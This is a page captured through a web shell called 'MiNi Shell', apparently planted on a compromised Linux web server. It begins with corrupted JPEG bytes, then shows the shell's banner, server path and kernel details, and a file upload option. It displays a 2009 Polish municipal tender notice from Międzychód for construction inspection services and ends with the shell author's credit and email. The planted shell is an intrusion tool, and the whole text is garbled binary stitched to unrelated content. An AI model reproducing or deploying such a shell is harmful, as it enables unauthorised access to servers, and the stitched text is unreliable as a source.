JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090109/10223-N-2009.html

<p class="kh_header"><b>Międzychód: Pełnienie funkcji inspektora nadzoru inwestorskiego nad robotami budowlanymi w trakcie realizacji zadania p.t.: Budowa drogi gminnej łączącej drogi wojewódzkie nr 160 i nr 182 pełniącej funkcję obwodnicy wraz z infrastrukturą towarzyszącą w Międzychodzie - I Etap.</b><br>
<b>Numer ogłoszenia: 10223 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Międzychodzie , ul. Piłsudskiego 2, 64-400 Międzychód, woj. wielkopolskie, tel. 095 7488100, faks 095 7488134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzychod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad robotami budowlanymi w trakcie realizacji zadania p.t.: Budowa drogi gminnej łączącej drogi wojewódzkie nr 160 i nr 182 pełniącej funkcję obwodnicy wraz z infrastrukturą towarzyszącą w Międzychodzie - I Etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia to pełnienie obowiązków inspektora nadzoru inwestorskiego w trakcie realizacji zadania p.t.: Budowa drogi gminnej łączącej drogi wojewódzkie nr 160 i nr 182 pełniącej funkcję obwodnicy wraz z infrastrukturą towarzyszącą w Międzychodzie - I Etap, zgodnie z ustawą z dnia 7 lipca 1994 r Prawo Budowlane ((t.j. Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami). Przedmiot zamówienia został podzielony na cztery odrębne części  obejmujące:
             a)część A - nadzór nad robotami  w branży drogowej,
             b)część B - nadzór nad robotami w branży wodno-kanalizacyjnej
             c)część C - nadzór nad robotami w branży elektrycznej
             d)część D - nadzór nad robotami w branży teletechnicznej 
Zakres obowiązków inspektora nadzoru wynika z art. 25 ustawy z dnia 7 lipca 1994 r. -Prawo budowlane (jednolity tekst: Dz. U. z 2006 r. Nr 156, poz. 1118, z pózn. zmianami) i obejmuje w szczególności m.in.: 
- Reprezentowanie interesów zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy o realizację inwestycji. 
- Dokonywanie sprawdzenia i weryfikacji dokumentacji technicznej, a w razie potrzeby wnioskowania do zamawiającego o dokonanie w niej zmian lub uzupełnień, mając na względzie aspekty ekonomiczne, techniczne i użytkowe obiektu, 
- Nadzorowanie prac budowlanych, których wykonanie określa dokumentacja projektowo - wykonawcza. 
- udział w czynnościach przekazania Wykonawcy zadania terenu budowy i udział w naradach  
  technicznych,
- Sprawdzanie poprawności kalkulacji sporządzanych przez wykonawców robót w zakresie obmiarów robót, nakładów rzeczowych, cen i narzutów oraz faktur w terminach wynikających z umów zawartych między wykonawcą, a zamawiającym. 
- Współpracę z nadzorem autorskim w okresie realizacji robót. 
- Kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacja techniczną i dokumentacją projektową. 
- Kontrolowanie zgodności wykonywanych robót z dokumentacją projektową, umową i obowiązującym w trakcie realizacji harmonogramem robót. 
-Rozstrzyganie - w uzgodnieniu z zamawiającym spraw technicznych powstałych w toku  wykonywania robót. 
- Sporządzanie protokołów konieczności w przypadku potrzeby wykonywania robót dodatkowych lub zamiennych, uzasadnienie potrzeby wykonywania tych prac oraz wnioskowanie do zamawiającego o ich wykonanie. 
- Kontrolowanie jakości oraz określania wartości materiałów uzyskanych z rozbiórki. 
- Sprawdzanie wykonania robót zanikowych. 
- Uczestniczenie w odbiorach i próbach technicznych instalacji i urządzeń. 
- Kompletowanie dokumentacji związanych z odbiorem końcowym. 
- Potwierdzanie gotowości do odbioru robót lub obiektu. 
- Uczestniczenie w czynnościach odbioru obiektu lub robót i przekazania ich do użytku. 
- Uczestniczenie w przeglądach w okresie gwarancji i rękojmi, oraz kontrolowanie usuwania ujawnionych wad i usterek. 
- Dokonanie rozliczenia końcowego inwestycji. 
- Dojazd i pobyt na placu budowy  ,minimum dwa razy w tygodniu, a w okresie gwarancji  minimum jeden raz w ciągu sześciu miesięcy. Ponadto inspektor nadzoru  powinien być dostępny  na każde zasadne wezwanie Zamawiającego lub Wykonawcy robót.
- Informowanie zleceniodawcy na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z zatwierdzonego przez zleceniodawcę harmonogramu robót. 
- Informowanie zleceniodawcy o terminach odbioru robót, których obowiązek odbioru spoczywa na zleceniobiorcy (ulegających zanikowi, częściowych, prób urządzeń i instalacji itp.) niezwłocznie po dokonaniu zgłoszenia odbioru przez wykonawcę robót, 
- Branie udziału w naradach koordynacyjnych związanych z realizacją nadzorowanych robót,
- Ciągła współpraca z komórkami organizacyjnymi Zamawiającego.
Wartości zadania inwestycyjnego objętego nadzorem inwestorskim wynosi odpowiednio: 
- branża drogowa - 2477402,04 zł (netto)
- branża wodno-kanalizacyjna - 1134216,76 zł (netto)
- branża energetyczna - 249922,10 zł (netto)
- branża teletechniczna - 20435,80 zł(netto)
Dokumentacja techniczno-kosztorysowa robót budowlanych objętych nadzorem
inwestorskim dostępna jest do wglądu w celu wyceny oferty w siedzibie Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki ogólne udziału w postępowaniu:
O zamówienie publiczne może ubiegać się Wykonawca, który:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień 
2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego w oparciu o przepisy art.24 ust.1 i 2 ustawy Prawo zamówień publicznych. 
1.1	 Warunki szczegółowe udziału w postępowaniu, określone w oparciu o art. 22 ust. 1 pkt 1-3 ustawy Pzp. 
Minimalne warunki udziału w postępowaniu są następujące:
a)osoby , które pełnić będą funkcje inspektora nadzoru w poszczególnych częściach  
   zamówienia winny posiadać uprawnienia do wykonywania samodzielnych funkcji   
   technicznych zgodnie z odpowiednimi przepisami ustawy - Prawo budowlane oraz należeć 
  do właściwej Izby Inżynierów Budownictwa. W tym zakresie: 
   - Inspektor Nadzoru ds. robót drogowych  winien posiadać uprawnienia budowlane bez 
     ograniczeń do kierowania robotami w specjalności drogowej i należeć do właściwej Izby  
     Inżynierów Budownictwa, 
   -  Inspektor Nadzoru ds. robót wodno-kanalizacyjnych winien posiadać uprawnienia do   
      kierowania robotami w proponowanej specjalności tj. uprawnienia instalacyjne w zakresie 
      sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych i należeć do właściwej Izby  
     Inżynierów Budownictwa, 
   -  Inspektor Nadzoru ds. robót elektroenergetycznych uprawnienia do kierowania robotami 
      w proponowanej specjalności, tj. uprawnienia instalacyjne w zakresie sieci, instalacji i 
     urządzeń elektrycznych i elektroenergetycznych i należeć do właściwej Izby  
     Inżynierów Budownictwa, 
   - Inspektor Nadzoru ds. robót teletechnicznych  winien posiadać uprawnienia do kierowania 
     robotami w  proponowanej specjalności tj. uprawnienia telekomunikacyjne i należeć do
    właściwej Izby   Inżynierów Budownictwa, 
b)  Wykonawca musi wykazać, że w okresie ostatnich 3 lat, przed dniem wszczęcia
niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy -
w tym okresie, zrealizował  co najmniej 2  zadania o charakterze i złożoności porównywalnej z przedmiotem dla  poszczególnych części zamówienia, tj.: 
-Część A: branża drogowa - nadzorował minimum co najmniej 2 zadania drogowe polegających  na budowie-przebudowie dróg o długości odcinka min 0,5km  każdy 
Część   B:, branża wodno - kanalizacyjna- nadzorował minimum co najmniej 2 zadania 
w zakresie budowy sieci wodno-kanalizacyjnej o długości odcinka min 0,5km  każdy 
Część   C: branża elektryczna- nadzorował minimum co najmniej 2 zadania 
w zakresie budowy oświetlenia drogowego o długości odcinka min 0,5km  każdy
Część   D: branża teletechniczna - nadzorował minimum co najmniej 2 zadania 
w zakresie budowy sieci telekomunikacyjnej o długości odcinka min 0,5km  każdy
2.	Inne warunki:
Wykonawca zobowiązany jest:
1)	Złożyć ofertę i zaakceptować istotne postanowienia umowy.
2)	Potwierdzić umocowanie do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku gdy umocowanie takie nie wynika ze złożonego dokumentu, o którym mowa w Dziale IV ust. 1 pkt 2 SIWZ.
3)	Dokonać wizji lokalnej terenu gdzie będzie wykonywany przedmiot zamówienia. 
3.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach załączonych do oferty. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w terminie wskazanym w Dziale VIII ustęp 1 i formie określonej w Dziale VI ustęp 2 SIWZ następujące dokumenty:
1.	Dokumenty potwierdzające spełnianie warunków ogólnych udziału w postępowaniu:
1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustęp 1 pkt 1-3 Ustawy (Załącznik nr 2 SIWZ).
1.1 Dokumenty potwierdzające spełnianie warunków szczegółowych udziału w postępowaniu:
A)Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (Załącznik nr 3 SIWZ). Jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował zobowiązany jest złożyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.
B)Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają wymagane uprawnienia tj.:
a)	decyzja o nadaniu uprawnień budowlanych / decyzja o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w danej specjalności m.in. w zakresie kierowania lub nadzorowania budowy,
b)	dokument potwierdzający aktualne członkostwo w Polskiej Izbie Inżynierów Budownictwa 
C)Na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć
do oferty wykaz ( należy wypełnić załącznik nr 4 do niniejszej siwz) wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie usług z którego będzie wynikało ,że pełnił funkcje inspektora nadzoru inwestorskiego na co najmniej 2 zadaniach o zakresie i złożoności porównywalnej z przedmiotem  poszczególnych części zamówienia .
1.2 Inne dokumenty:
1)	Wypełniony Formularz ofertowy  wraz z załącznikami .
2)	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
1.3Dokumenty wymagane w postępowaniu - podmiot zagraniczny:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  zamiast dokumentu, o którym mowa w ustępie 1 składa dokument, wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2)	Dokument, o których mowa w punkcie 1 powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu wymienionego powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis punktu 2 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzychod.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego podanej w pkt. I.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2009 godzina 12:00, miejsce: w sidzibie Zamawiającego tj. Urząd Miasta i Gminy w Międzychodzie
ul. Piłsudskiego 2 , 64-400 Międzychód (pok. nr 45 sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com